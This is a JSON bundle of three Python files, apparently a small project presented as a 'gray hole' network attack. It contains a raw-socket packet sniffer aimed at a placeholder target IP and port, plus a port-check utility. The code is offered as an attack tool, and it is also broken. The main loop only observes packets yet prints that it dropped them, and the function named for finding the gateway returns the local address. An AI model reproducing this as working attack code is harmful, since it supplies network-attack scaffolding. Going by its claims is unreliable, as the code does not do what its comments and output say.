[
    {
        "file_name": "gray_hole_attack.py",
        "file_content": "# gray_hole_attack.py\n# This is the main file for the Gray Hole Attack implementation.\n# It sets up the network and starts the attack.\n\nimport socket\nimport threading\nimport time\nfrom scapy.all import *\n\n# Function to perform the gray hole attack\ndef gray_hole_attack(target_ip, target_port, gateway_ip):\n    # Create a socket to capture packets\n    sniffer = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))\n\n    # Bind the socket to the network interface\n    sniffer.bind(('eth0', 0))\n\n    # Start sniffing packets\n    while True:\n        packet = sniffer.recvfrom(65535)[0]\n        ip_layer = IP(packet)\n        if ip_layer.dst == target_ip and ip_layer.proto == 6:  # Check if the packet is TCP and destined for the target\n            tcp_layer = ip_layer[TCP]\n            if tcp_layer.dport == target_port:\n                # Drop the packet silently\n                print(f\"Dropped packet from {ip_layer.src} to {ip_layer.dst}:{tcp_layer.dport}\")\n                time.sleep(1)  # Simulate delay before dropping the packet\n\n# Function to start the attack in a separate thread\ndef start_attack(target_ip, target_port, gateway_ip):\n    attack_thread = threading.Thread(target=gray_hole_attack, args=(target_ip, target_port, gateway_ip))\n    attack_thread.start()\n\nif __name__ == \"__main__\":\n    TARGET_IP = '192.168.1.100'  # Replace with the target IP address\n    TARGET_PORT = 80  # Replace with the target port\n    GATEWAY_IP = '192.168.1.1'  # Replace with the gateway IP address\n\n    start_attack(TARGET_IP, TARGET_PORT, GATEWAY_IP)"
    },
    {
        "file_name": "packet_sniffer.py",
        "file_content": "# packet_sniffer.py\n# This file contains the functionality to sniff packets on the network.\n\nimport socket\nfrom scapy.all import *\n\n# Function to sniff packets on the network\ndef sniff_packets(interface='eth0'):\n    # Create a socket to capture packets\n    sniffer = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))\n\n    # Bind the socket to the network interface\n    sniffer.bind((interface, 0))\n\n    # Start sniffing packets\n    while True:\n        packet = sniffer.recvfrom(65535)[0]\n        ip_layer = IP(packet)\n        print(f\"Sniffed packet from {ip_layer.src} to {ip_layer.dst}\")\n        yield packet\n\n# Example usage\nif __name__ == \"__main__\":\n    for packet in sniff_packets():\n        pass  # Process the packet as needed"
    },
    {
        "file_name": "utils.py",
        "file_content": "# utils.py\n# This file contains utility functions for the gray hole attack.\n\nimport socket\nfrom scapy.all import *\n\n# Function to get the gateway IP address\ndef get_gateway_ip():\n    # Create a socket to get the gateway IP\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    s.connect(('8.8.8.8', 80))\n    gateway_ip = s.getsockname()[0]\n    s.close()\n    return gateway_ip\n\n# Function to check if a port is open\ndef is_port_open(ip, port):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.settimeout(1)\n    try:\n        s.connect((ip, port))\n        s.shutdown(2)\n        return True\n    except:\n        return False\n    finally:\n        s.close()\n\n# Example usage\nif __name__ == \"__main__\":\n    print(\"Gateway IP:\", get_gateway_ip())\n    print(\"Port 80 open:\", is_port_open('192.168.1.100', 80))"
    }
]